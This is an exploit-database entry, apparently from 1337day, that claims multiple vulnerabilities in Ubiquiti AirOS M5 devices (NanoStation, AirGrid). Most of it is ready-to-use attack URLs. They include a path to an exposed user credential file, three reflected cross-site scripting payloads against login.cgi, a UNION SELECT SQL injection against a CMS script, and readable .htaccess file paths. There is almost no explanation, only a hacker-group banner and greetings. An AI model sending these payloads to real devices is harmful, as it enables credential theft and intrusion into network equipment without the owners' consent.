AirOs (NanoStation,AirGrid) M5 Multiple Vulnerabilities

2012-06-09T00:00:00
ID 1337DAY-ID-18536
Type zdt
Reporter Angel Injection
Modified 2012-06-09T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] AirOs(NanoStation,AirGrid)M5 Multiple Vulnerabilities
[-] Found by Angel Injection
[-] Link: www.ubnt.com
[-] Security -::RISK: High
[-] platforms: hardware
[-] http://1337day.com http://r00tw0rm.com http://i313.cc
[-] Greetz to 1337day.com(r0073r) Team i313.cc(Sn!PEr_R00T,Lion,BackTrack) r00tw0rm.com Team (CrosS And All Members)


Exploit 1 (Exposure of User Credentials)

vuln

http://192.168.1.20:80/data/userlist.txt There Are .htaccess File


Exploit 2 (CrosS Site Scripting "prompt")

http://192.168.1.20/login.cgi?uri=%22%20onmouseover%3dprompt%28962038%29%20bad%3d%22

http://192.168.1.20/login.cgi?uri=/index.php/"onmouseover=prompt(935107)%3E

http://192.168.1.20/login.cgi?uri=/"%20onmouseover=prompt(944551)%20bad="

Response Header
HTTP/1.1 200 OK
Set-cookie: ui_language=en_US; expires=Tuesday, 19-Jan-38 03:14:07 GMT
Content-type: text/html
Date: Wed, 30 Mar 2011 14:05:18 GMT
Server: lighttpd/1.4.28-devel-4866
Content-Length: 8180


Exploit 3 (sql Injection)

http://192.168.1.20:80/cms/revert-content.php?type=newest&id=[sql here]

http://192.168.1.20:80/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,11221133,null,null/*


Exploit 4 (.htaccess File Readable)

http://192.168.1.20/.htaccess
http://192.168.1.20/cms/.htaccess
http://192.168.1.20/FCKeditor/.htaccess
http://192.168.1.20/data/.htaccess

./exit



#  0day.today [2018-01-10]  #